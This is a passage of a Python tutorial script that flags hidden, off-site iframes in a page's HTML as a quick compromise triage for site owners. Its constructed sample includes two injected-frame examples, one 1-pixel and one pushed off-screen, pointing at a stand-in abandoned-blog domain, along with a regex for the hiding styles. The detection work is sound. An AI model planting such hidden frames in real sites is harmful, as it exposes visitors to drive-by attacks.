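means a 0/1-pixel frame, a hidden attribute, or an inline style that hides
or pushes the frame off-screen. The HTML sample is constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline-style idioms used to keep an injected frame invisible.
HIDDEN_STYLE_RE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}", re.I
)


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def is_tiny(attrs):
    """Injected frames are typically 0 or 1 pixel in both dimensions."""
    try:
        return (int(attrs.get("width") or "100") <= 1
                and int(attrs.get("height") or "100") <= 1)
    except ValueError:
        return False


def is_offsite(src, site_domain):
    """True when the frame source resolves to a host outside site_domain.
    Protocol-relative sources (//host/path) are handled by urlparse."""
    host = urlparse(src).hostname or ""
    return bool(host) and host != site_domain and not host.endswith("." + site_domain)


def suspicious_iframes(html, site_domain):
    """Return the src of every iframe that is both off-site and hidden."""
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        hidden = (is_tiny(attrs) or "hidden" in attrs
                  or bool(HIDDEN_STYLE_RE.search(attrs.get("style") or "")))
        if is_offsite(src, site_domain) and hidden:
            hits.append(src)
    return hits


# Constructed sample page for www.example.com: one legitimate embed and two
# injected frames pointing at an abandoned blog (assumed domain).
SAMPLE_HTML = """
<html><body>
<h1>Recipes</h1>
<iframe src="https://www.example.com/video-embed" width="640" height="360"></iframe>
<iframe src="http://forgotten-blog.example.net/wp-content/uploads/x.php" width="1" height="1"></iframe>
<iframe src="http://forgotten-blog.example.net/load.html" style="position:absolute;left:-9999px"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for src in suspicious_iframes(SAMPLE_HTML, "www.example.com"):
        print("suspicious iframe:", src)
```

The check looks only at the iframe's own attributes; a frame hidden by a parent element's CSS, or injected by JavaScript after page load, needs a rendered-DOM scan rather than a static parse. It is meant as a quick triage for a site owner who suspects a compromise, not as a substitute for keeping the CMS patched.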